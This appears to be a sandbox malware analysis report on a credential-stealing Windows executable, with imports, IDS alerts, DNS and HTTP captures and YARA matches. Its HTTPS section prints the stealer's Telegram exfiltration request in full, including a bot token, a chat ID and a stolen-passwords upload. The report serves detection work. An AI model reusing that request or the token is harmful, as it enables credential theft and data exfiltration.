USER32.dll	SetWindowPos, GetCursorInfo, RegisterHotKey, ClientToScreen, GetKeyboardLayoutNameW, IsCharAlphaW, IsCharAlphaNumericW, IsCharLowerW, IsCharUpperW, GetMenuStringW, GetSubMenu, GetCaretPos, IsZoomed, MonitorFromPoint, GetMonitorInfoW, SetWindowLongW, SetLayeredWindowAttributes, FlashWindow, GetClassLongW, TranslateAcceleratorW, IsDialogMessageW, GetSysColor, InflateRect, DrawFocusRect, DrawTextW, FrameRect, DrawFrameControl, FillRect, PtInRect, DestroyAcceleratorTable, CreateAcceleratorTableW, SetCursor, GetWindowDC, GetSystemMetrics, DrawMenuBar, GetActiveWindow, CharNextW, wsprintfW, RedrawWindow, DestroyMenu, SetMenu, GetWindowTextLengthW, CreateMenu, IsDlgButtonChecked, DefDlgProcW, CallWindowProcW, ReleaseCapture, SetCapture, MonitorFromRect, LoadImageW, CreateIconFromResourceEx, mouse_event, ExitWindowsEx, SetActiveWindow, FindWindowExW, EnumThreadWindows, SetMenuDefaultItem, InsertMenuItemW, IsMenu, TrackPopupMenuEx, GetCursorPos, CopyImage, CheckMenuRadioItem, GetMenuItemID, GetMenuItemCount, SetMenuItemInfoW, GetMenuItemInfoW, SetForegroundWindow, IsIconic, FindWindowW, UnregisterHotKey, keybd_event, SendInput, GetAsyncKeyState, SetKeyboardState, GetKeyboardState, GetKeyState, VkKeyScanW, LoadStringW, DialogBoxParamW, MessageBeep, EndDialog, SendDlgItemMessageW, GetDlgItem, SetWindowTextW, CopyRect, ReleaseDC, GetDC, EndPaint, BeginPaint, GetClientRect, GetMenu, DestroyWindow, EnumWindows, GetDesktopWindow, IsWindow, IsWindowEnabled, IsWindowVisible, EnableWindow, InvalidateRect, GetWindowLongW, GetWindowThreadProcessId, AttachThreadInput, GetFocus, ScreenToClient, SendMessageTimeoutW, EnumChildWindows, CharUpperBuffW, GetClassNameW, GetParent, GetDlgCtrlID, SendMessageW, MapVirtualKeyW, PostMessageW, GetWindowRect, SetUserObjectSecurity, CloseDesktop, CloseWindowStation, OpenDesktopW, SetProcessWindowStation, GetProcessWindowStation, OpenWindowStationW, GetUserObjectSecurity, AdjustWindowRectEx, SetRect, SetClipboardData, EmptyClipboard, CountClipboardFormats, CloseClipboard, GetClipboardData, IsClipboardFormatAvailable, OpenClipboard, BlockInput, GetMessageW, LockWindowUpdate, DispatchMessageW, TranslateMessage, DeleteMenu, PeekMessageW, MessageBoxW, DefWindowProcW, MoveWindow, SetFocus, PostQuitMessage, KillTimer, CreatePopupMenu, RegisterWindowMessageW, SetTimer, ShowWindow, CreateWindowExW, RegisterClassExW, LoadIconW, LoadCursorW, GetSysColorBrush, GetForegroundWindow, MessageBoxA, DestroyIcon, SystemParametersInfoW, CharLowerBuffW, GetWindowTextW
GDI32.dll	SetPixel, DeleteObject, GetTextExtentPoint32W, ExtCreatePen, StrokeAndFillPath, StrokePath, GetDeviceCaps, CloseFigure, LineTo, AngleArc, CreateCompatibleBitmap, CreateCompatibleDC, MoveToEx, Ellipse, PolyDraw, BeginPath, SelectObject, StretchBlt, GetDIBits, DeleteDC, GetPixel, CreateDCW, GetStockObject, Rectangle, SetViewportOrgEx, GetObjectW, SetBkMode, RoundRect, SetBkColor, CreatePen, CreateSolidBrush, SetTextColor, CreateFontW, GetTextFaceW, EndPath
COMDLG32.dll	GetSaveFileNameW, GetOpenFileNameW
ADVAPI32.dll	GetAclInformation, RegEnumValueW, RegDeleteValueW, RegDeleteKeyW, RegEnumKeyExW, RegSetValueExW, RegCreateKeyExW, GetUserNameW, RegOpenKeyExW, RegCloseKey, RegQueryValueExW, RegConnectRegistryW, InitializeSecurityDescriptor, InitializeAcl, AdjustTokenPrivileges, OpenThreadToken, OpenProcessToken, LookupPrivilegeValueW, DuplicateTokenEx, CreateProcessAsUserW, CreateProcessWithLogonW, GetLengthSid, CopySid, InitiateSystemShutdownExW, LogonUserW, AllocateAndInitializeSid, CheckTokenMembership, FreeSid, GetTokenInformation, GetSecurityDescriptorDacl, SetSecurityDescriptorDacl, AddAce, GetAce
SHELL32.dll	DragQueryPoint, ShellExecuteExW, DragQueryFileW, SHEmptyRecycleBinW, SHGetPathFromIDListW, SHBrowseForFolderW, SHCreateShellItem, SHGetDesktopFolder, SHGetSpecialFolderLocation, SHGetFolderPathW, SHFileOperationW, ExtractIconExW, Shell_NotifyIconW, ShellExecuteW, DragFinish
ole32.dll	CoTaskMemAlloc, CoTaskMemFree, CLSIDFromString, ProgIDFromCLSID, CLSIDFromProgID, OleSetMenuDescriptor, MkParseDisplayName, OleSetContainedObject, CoCreateInstance, IIDFromString, StringFromGUID2, CreateStreamOnHGlobal, CoInitialize, CoUninitialize, GetRunningObjectTable, CoGetInstanceFromFile, CoGetObject, CoInitializeSecurity, CoCreateInstanceEx, CoSetProxyBlanket
OLEAUT32.dll	RegisterTypeLib, LoadTypeLibEx, VariantCopyInd, SysReAllocString, SysFreeString, SafeArrayDestroyDescriptor, SafeArrayDestroyData, SafeArrayUnaccessData, SafeArrayAccessData, SafeArrayAllocData, UnRegisterTypeLib, SafeArrayCreateVector, SysAllocString, SysStringLen, VariantTimeToSystemTime, VarR8FromDec, SafeArrayGetVartype, OleLoadPicture, QueryPathOfRegTypeLib, VariantCopy, VariantClear, CreateDispTypeInfo, CreateStdDispatch, DispCallFunc, VariantChangeType, SafeArrayAllocDescriptorEx, VariantInit

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	Great Britain

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2025-01-11T09:37:03.872616+0100	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.5	49704	158.101.44.242	80	TCP
2025-01-11T09:37:10.342161+0100	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.5	49704	158.101.44.242	80	TCP
2025-01-11T09:37:11.035720+0100	1810008	Joe Security ANOMALY Telegram Send File	1	192.168.2.5	49705	149.154.167.220	443	TCP
2025-01-11T09:37:11.456927+0100	2057744	ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram	1	192.168.2.5	49705	149.154.167.220	443	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 11, 2025 09:36:59.324552059 CET	49704	80	192.168.2.5	158.101.44.242
Jan 11, 2025 09:36:59.329480886 CET	80	49704	158.101.44.242	192.168.2.5
Jan 11, 2025 09:36:59.329595089 CET	49704	80	192.168.2.5	158.101.44.242
Jan 11, 2025 09:36:59.329925060 CET	49704	80	192.168.2.5	158.101.44.242
Jan 11, 2025 09:36:59.334696054 CET	80	49704	158.101.44.242	192.168.2.5
Jan 11, 2025 09:37:01.330545902 CET	80	49704	158.101.44.242	192.168.2.5
Jan 11, 2025 09:37:01.372632027 CET	49704	80	192.168.2.5	158.101.44.242
Jan 11, 2025 09:37:01.666068077 CET	49704	80	192.168.2.5	158.101.44.242
Jan 11, 2025 09:37:01.670984983 CET	80	49704	158.101.44.242	192.168.2.5
Jan 11, 2025 09:37:03.822345018 CET	80	49704	158.101.44.242	192.168.2.5
Jan 11, 2025 09:37:03.872616053 CET	49704	80	192.168.2.5	158.101.44.242
Jan 11, 2025 09:37:08.962085009 CET	49704	80	192.168.2.5	158.101.44.242
Jan 11, 2025 09:37:08.966923952 CET	80	49704	158.101.44.242	192.168.2.5
Jan 11, 2025 09:37:10.301234007 CET	80	49704	158.101.44.242	192.168.2.5
Jan 11, 2025 09:37:10.312890053 CET	49705	443	192.168.2.5	149.154.167.220
Jan 11, 2025 09:37:10.312942982 CET	443	49705	149.154.167.220	192.168.2.5
Jan 11, 2025 09:37:10.313018084 CET	49705	443	192.168.2.5	149.154.167.220
Jan 11, 2025 09:37:10.319724083 CET	49705	443	192.168.2.5	149.154.167.220
Jan 11, 2025 09:37:10.319758892 CET	443	49705	149.154.167.220	192.168.2.5
Jan 11, 2025 09:37:10.342160940 CET	49704	80	192.168.2.5	158.101.44.242
Jan 11, 2025 09:37:10.935638905 CET	443	49705	149.154.167.220	192.168.2.5
Jan 11, 2025 09:37:10.935782909 CET	49705	443	192.168.2.5	149.154.167.220
Jan 11, 2025 09:37:10.940459967 CET	49705	443	192.168.2.5	149.154.167.220
Jan 11, 2025 09:37:10.940483093 CET	443	49705	149.154.167.220	192.168.2.5
Jan 11, 2025 09:37:10.940987110 CET	443	49705	149.154.167.220	192.168.2.5
Jan 11, 2025 09:37:10.981991053 CET	49705	443	192.168.2.5	149.154.167.220
Jan 11, 2025 09:37:10.994802952 CET	49705	443	192.168.2.5	149.154.167.220
Jan 11, 2025 09:37:11.035330057 CET	443	49705	149.154.167.220	192.168.2.5
Jan 11, 2025 09:37:11.035391092 CET	49705	443	192.168.2.5	149.154.167.220
Jan 11, 2025 09:37:11.035407066 CET	443	49705	149.154.167.220	192.168.2.5
Jan 11, 2025 09:37:11.456964016 CET	443	49705	149.154.167.220	192.168.2.5
Jan 11, 2025 09:37:11.457061052 CET	443	49705	149.154.167.220	192.168.2.5
Jan 11, 2025 09:37:11.457566023 CET	49705	443	192.168.2.5	149.154.167.220
Jan 11, 2025 09:37:11.462507010 CET	49705	443	192.168.2.5	149.154.167.220
Jan 11, 2025 09:38:15.301323891 CET	80	49704	158.101.44.242	192.168.2.5
Jan 11, 2025 09:38:15.301424980 CET	49704	80	192.168.2.5	158.101.44.242
Jan 11, 2025 09:38:50.310461044 CET	49704	80	192.168.2.5	158.101.44.242
Jan 11, 2025 09:38:50.315300941 CET	80	49704	158.101.44.242	192.168.2.5

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 11, 2025 09:36:59.310806990 CET	54712	53	192.168.2.5	1.1.1.1
Jan 11, 2025 09:36:59.317881107 CET	53	54712	1.1.1.1	192.168.2.5
Jan 11, 2025 09:37:10.304343939 CET	65492	53	192.168.2.5	1.1.1.1
Jan 11, 2025 09:37:10.312119961 CET	53	65492	1.1.1.1	192.168.2.5

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Jan 11, 2025 09:36:59.310806990 CET	192.168.2.5	1.1.1.1	0xf485	Standard query (0)	checkip.dyndns.org	A (IP address)	IN (0x0001)	false
Jan 11, 2025 09:37:10.304343939 CET	192.168.2.5	1.1.1.1	0x8992	Standard query (0)	api.telegram.org	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Jan 11, 2025 09:36:59.317881107 CET	1.1.1.1	192.168.2.5	0xf485	No error (0)	checkip.dyndns.org	checkip.dyndns.com		CNAME (Canonical name)	IN (0x0001)	false
Jan 11, 2025 09:36:59.317881107 CET	1.1.1.1	192.168.2.5	0xf485	No error (0)	checkip.dyndns.com		158.101.44.242	A (IP address)	IN (0x0001)	false
Jan 11, 2025 09:36:59.317881107 CET	1.1.1.1	192.168.2.5	0xf485	No error (0)	checkip.dyndns.com		132.226.8.169	A (IP address)	IN (0x0001)	false
Jan 11, 2025 09:36:59.317881107 CET	1.1.1.1	192.168.2.5	0xf485	No error (0)	checkip.dyndns.com		193.122.130.0	A (IP address)	IN (0x0001)	false
Jan 11, 2025 09:36:59.317881107 CET	1.1.1.1	192.168.2.5	0xf485	No error (0)	checkip.dyndns.com		193.122.6.168	A (IP address)	IN (0x0001)	false
Jan 11, 2025 09:36:59.317881107 CET	1.1.1.1	192.168.2.5	0xf485	No error (0)	checkip.dyndns.com		132.226.247.73	A (IP address)	IN (0x0001)	false
Jan 11, 2025 09:37:10.312119961 CET	1.1.1.1	192.168.2.5	0x8992	No error (0)	api.telegram.org		149.154.167.220	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

api.telegram.org

checkip.dyndns.org

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.5	49704	158.101.44.242	80	5596	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 09:36:59.329925060 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Jan 11, 2025 09:37:01.330545902 CET	321	IN	HTTP/1.1 200 OK Date: Sat, 11 Jan 2025 08:37:01 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 48184b46219273adb2d6dba2e94bde20 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>
Jan 11, 2025 09:37:01.666068077 CET	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Jan 11, 2025 09:37:03.822345018 CET	730	IN	HTTP/1.1 502 Bad Gateway Date: Sat, 11 Jan 2025 08:37:03 GMT Content-Type: text/html Content-Length: 547 Connection: keep-alive X-Request-ID: 07b1aed9d3f828787b37919aa9aa97f4 Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 35 30 32 20 42 61 64 20 47 61 74 65 77 61 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 35 30 32 20 42 61 64 20 47 61 74 65 77 61 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 [TRUNCATED] Data Ascii: <html><head><title>502 Bad Gateway</title></head><body><center><h1>502 Bad Gateway</h1></center><hr><center></center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->
Jan 11, 2025 09:37:08.962085009 CET	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Jan 11, 2025 09:37:10.301234007 CET	321	IN	HTTP/1.1 200 OK Date: Sat, 11 Jan 2025 08:37:10 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: ffa6c39673e7f549ac061d2eb81674be Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.5	49705	149.154.167.220	443	5596	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-11 08:37:10 UTC	296	OUT	POST /bot8152393919:AAFcv9D2OhgJkwW5R_jm9t4Pm6asb_5vQdk/sendDocument?chat_id=1437092720&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1 Content-Type: multipart/form-data; boundary================8dd31f13a4ccec0 Host: api.telegram.org Content-Length: 1077 Connection: Keep-Alive
2025-01-11 08:37:11 UTC	1077	OUT	Data Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 33 31 66 31 33 61 34 63 63 65 63 30 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 Data Ascii: --===============8dd31f13a4ccec0Content-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
2025-01-11 08:37:11 UTC	388	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Sat, 11 Jan 2025 08:37:11 GMT Content-Type: application/json Content-Length: 560 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2025-01-11 08:37:11 UTC	560	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 32 30 30 30 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 38 31 35 32 33 39 33 39 31 39 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4e 4f 56 41 4c 4f 47 47 45 52 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4e 4f 56 41 4c 4f 47 47 45 52 44 41 4e 4e 59 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 34 33 37 30 39 32 37 32 30 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 49 66 65 61 6e 79 69 63 68 75 6b 77 75 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 49 66 65 61 6e 79 69 63 68 75 6b 77 75 30 30 39 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 36 35 38 34 36 33 31 2c Data Ascii: {"ok":true,"result":{"message_id":2000,"from":{"id":8152393919,"is_bot":true,"first_name":"NOVALOGGER","username":"NOVALOGGERDANNYbot"},"chat":{"id":1437092720,"first_name":"Ifeanyichukwu","username":"Ifeanyichukwu009","type":"private"},"date":1736584631,

Target ID:	0
Start time:	03:36:55
Start date:	11/01/2025
Path:	C:\Users\user\Desktop\nfKqna8HuC.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\nfKqna8HuC.exe"
Imagebase:	0x620000
File size:	1'147'392 bytes
MD5 hash:	377F17E222F90E7DBB2D75C7BA9175F3
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: MALWARE_Win_RedLine, Description: Detects RedLine infostealer, Source: 00000000.00000002.2064042860.0000000001FF0000.00000004.00001000.00020000.00000000.sdmp, Author: ditekSHen
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	2
Start time:	03:36:57
Start date:	11/01/2025
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\nfKqna8HuC.exe"
Imagebase:	0xa60000
File size:	45'984 bytes
MD5 hash:	9D352BC46709F0CB5EC974633A0C3C94
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_MassLogger, Description: Yara detected MassLogger RAT, Source: 00000002.00000002.3303343228.0000000002FB0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000002.3303343228.0000000002FB0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000002.00000002.3303343228.0000000002FB0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000002.00000002.3303343228.0000000002FB0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000002.00000002.3303343228.0000000002FB0000.00000004.08000000.00040000.00000000.sdmp, Author: unknown Rule: MAL_Envrial_Jan18_1, Description: Detects Encrial credential stealer malware, Source: 00000002.00000002.3303343228.0000000002FB0000.00000004.08000000.00040000.00000000.sdmp, Author: Florian Roth Rule: JoeSecurity_MassLogger, Description: Yara detected MassLogger RAT, Source: 00000002.00000002.3302928287.0000000002E20000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000002.3302928287.0000000002E20000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000002.00000002.3302928287.0000000002E20000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000002.00000002.3302928287.0000000002E20000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000002.00000002.3302928287.0000000002E20000.00000004.08000000.00040000.00000000.sdmp, Author: unknown Rule: MAL_Envrial_Jan18_1, Description: Detects Encrial credential stealer malware, Source: 00000002.00000002.3302928287.0000000002E20000.00000004.08000000.00040000.00000000.sdmp, Author: Florian Roth Rule: JoeSecurity_MassLogger, Description: Yara detected MassLogger RAT, Source: 00000002.00000002.3304747884.0000000004061000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000002.3304747884.0000000004061000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000002.00000002.3304747884.0000000004061000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000002.00000002.3304747884.0000000004061000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000002.00000002.3304747884.0000000004061000.00000004.00000800.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_MassLogger, Description: Yara detected MassLogger RAT, Source: 00000002.00000002.3302818296.0000000002BE0000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000002.3302818296.0000000002BE0000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000002.00000002.3302818296.0000000002BE0000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000002.00000002.3302818296.0000000002BE0000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000002.00000002.3302818296.0000000002BE0000.00000004.00000020.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_MassLogger, Description: Yara detected MassLogger RAT, Source: 00000002.00000002.3303484774.00000000031F1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000002.3303484774.00000000031F1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000002.00000002.3303484774.00000000031F1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: MALWARE_Win_RedLine, Description: Detects RedLine infostealer, Source: 00000002.00000002.3301740960.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: ditekSHen
Reputation:	high
Has exited:	false

Show Windows behavior

Execution Graph

Execution Coverage:	4.1%
Dynamic/Decrypted Code Coverage:	1.4%
Signature Coverage:	5.8%
Total number of Nodes:	2000
Total number of Limit Nodes:	165

Executed Functions

Function 0064B043 Relevance: 21.5, APIs: 14, Instructions: 537
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000000.00000002.2062988123.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.2062968514.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063035119.00000000006AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063035119.00000000006CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063076387.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063096126.00000000006E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_nfKqna8HuC.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3adf484a9d1f5b9acd617d81420c50a957b85a120dda66e82400fdd02b043130
Instruction ID: 6948ba21be1c977ef5c5df1fa40bb83a3ee8c8c47858bf10fa168deece35b549
Opcode Fuzzy Hash: 3adf484a9d1f5b9acd617d81420c50a957b85a120dda66e82400fdd02b043130
Instruction Fuzzy Hash: BC325A75B022288FDB249F54DC81AE9B7F6FF4A310F1850D9E40AA7A85D7309E81CF52

Function 00623D19 Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 151
windowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentDirectoryW.KERNEL32(00007FFF,?,00000000,00000001,?,?,00623AA3,?), ref: 00623D45
IsDebuggerPresent.KERNEL32(?,?,?,?,00623AA3,?), ref: 00623D57
GetFullPathNameW.KERNEL32(00007FFF,?,?,006E1148,006E1130,?,?,?,?,00623AA3,?), ref: 00623DC8

Part of subcall function 00626430: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,00623DEE,006E1148,?,?,?,?,?,00623AA3,?), ref: 00626471

SetCurrentDirectoryW.KERNEL32(?,?,?,00623AA3,?), ref: 00623E48
MessageBoxA.USER32(00000000,This is a third-party compiled AutoIt script.,006D28F4,00000010), ref: 00691CCE
SetCurrentDirectoryW.KERNEL32(?,006E1148,?,?,?,?,?,00623AA3,?), ref: 00691D06
GetForegroundWindow.USER32(runas,?,?,?,00000001,?,006BDAB4,006E1148,?,?,?,?,?,00623AA3,?), ref: 00691D89
ShellExecuteW.SHELL32(00000000,?,?,?,?,00623AA3), ref: 00691D90

Part of subcall function 00623E6E: GetSysColorBrush.USER32(0000000F), ref: 00623E79
Part of subcall function 00623E6E: LoadCursorW.USER32(00000000,00007F00), ref: 00623E88
Part of subcall function 00623E6E: LoadIconW.USER32(00000063), ref: 00623E9E
Part of subcall function 00623E6E: LoadIconW.USER32(000000A4), ref: 00623EB0
Part of subcall function 00623E6E: LoadIconW.USER32(000000A2), ref: 00623EC2
Part of subcall function 00623E6E: RegisterClassExW.USER32(?), ref: 00623F30

